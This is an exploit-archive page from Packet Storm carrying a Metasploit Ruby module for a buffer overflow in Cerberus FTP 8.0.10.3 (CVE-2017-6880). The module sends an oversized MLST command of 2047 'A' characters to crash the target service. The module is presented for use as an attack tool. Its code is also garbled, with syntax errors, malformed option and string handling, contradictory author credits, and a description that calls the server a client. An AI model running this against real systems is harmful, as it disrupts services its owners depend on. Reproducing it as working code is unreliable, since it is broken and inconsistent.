exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Cerberus FTP 8.0.10.3 MLST Buffer Overflow

Cerberus FTP 8.0.10.3 MLST Buffer Overflow
Posted May 15, 2017
Authored by Souhardya Sardar | Site metasploit.com

This Metasploit module exploits a buffer overflow in the Cerberus FTP client version 8.0.10.3 that is triggered by sending a bad char "A" in the command "MLST".

tags | exploit, overflow
advisories | CVE-2017-6880
SHA-256 | f6b505ea1428a3f5f93df139b72623113999eac71ef627594621b4e58ddbd048

Cerberus FTP 8.0.10.3 MLST Buffer Overflow

Change Mirror Download
#!/usr/share/ruby

#[+] Title: Cerberus FTP Server 8.0.10.3 a 'MLST' Remote Buffer Overflow
#[+] Credits / Discovery: Nassim Asrir
#[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
#[+] Metasploit Module Author : Souhardya Sardar
#[+] Metasploit Module Author Contact: github.com/Souhardya | Souhardya.sardar@protonmail.com
#[+] Author Company: Henceforth
#[+] CVE: CVE-2017-6880

#Vendor:
#===============
#
#https://www.cerberusftp.com/


#Download:
#===========
#
#https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)


#Vulnerability Type:
#===================
#
#Remote Buffer Overflow.



# ----------------------------
# Module Dependencies/requires
# ----------------------------

require 'msf/core'

# ----------------------------------
# Metasploit Class name and includes
# ----------------------------------

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::Ftp

# -----------------------------------------
# Initialize information
# -----------------------------------------

def initialize(info = {})
super(update_info(info,
'Name' => 'Cerber FTP Remote Buffer Overflow ',
'Description' => %q{
This module exploits a buffer overflow in the Cerber FTP client that is triggered
by sending a bad char "A" in the command "MLST" (2047) .
},

'Author' =>
[
'Module Author And Bug Discovered by : Peter Baris',
'Coded by : Souhardya Sardar (github.com/Souhardya)', #metasploit module :)
'Thanks to : Nidhish Pandya ', #auditing:)


],
'License' => NONE,
'Platform' => ['win']

'References' =>
[
[ 'CVE', 'CVE-2017-6880' ],
[ Reference code taken from original POC located here :- https://www.exploit-db.com/exploits/41620/ ]

]))

register_optionsOptPort.new('SRVPORT', [true, "The remote FTP server port", 21])
], self.class)
deregister_options('FTPUSER', 'FTPPASS')
end

def exploit
connect

payload = "A"*2047

print_status("Trying to connect to target server {target.name...")


sock.put('MLST ' + payload + '\r\n')

handler
disconnect
end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close